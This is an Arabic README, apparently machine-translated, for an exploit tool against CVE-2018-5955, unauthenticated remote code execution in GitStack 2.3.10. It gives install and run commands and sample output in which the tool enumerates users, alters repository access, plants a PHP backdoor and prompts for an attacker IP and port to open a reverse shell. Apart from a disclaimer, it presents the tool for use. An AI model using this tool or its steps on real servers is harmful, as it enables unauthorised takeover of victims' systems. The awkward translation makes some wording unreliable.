استغلال لـ CVE-2018-5955 GITSTACK 2.3.10 RCE غير مصادقة
استغلال: GitStack 2.3.10 تنفيذ رمز بعيد غير مصادق
التاريخ: 18.01.2018
رابط البرنامج: https://gitstack.com/
مؤلف استغلال: Kacper Szurek
الاستغلال الأصلي: https://www.exploit-db.com/exploits/43777
الموقع الإلكتروني: https://security.szurek.pl/
الفئة: عن بُعد
CVE: CVE-2018-5955
التاريخ: 23.06.2023
ميزات جديدة: RCE التفاعلي ، OS ، وظيفة قذيفة عكسية ، مقتبسة من Python2 إلى Python3
CVE: CVE-2018-5955
الفئة: عن بُعد
لا أتحمل أي مسؤولية عن أفعالك ، حيث قمت بنشرها على Github لأغراض التعليم أو اختبار الاختراق المعتمد والمصرح به
متطلبات التثبيت:
pip install colorama
ثم ، يمكنك تشغيله مع:
python3 exploit.py
سيتم اكتشاف نظام التشغيل بعد استغلال CVE ، في الواقع سيكون هناك خط الإخراج هذا: "[*] OS: $ OperatingSystem" (DimoStration أدناه)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
يمكنك أيضًا كتابة "OS" لمعرفة نوع نظام التشغيل
للحصول على قذيفة عكسية فعلية على الهدف ، يمكنك كتابة "shell" ثم اكتب عنوان IP الخاص بك ومنفذ الاستماع مثل هذا:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE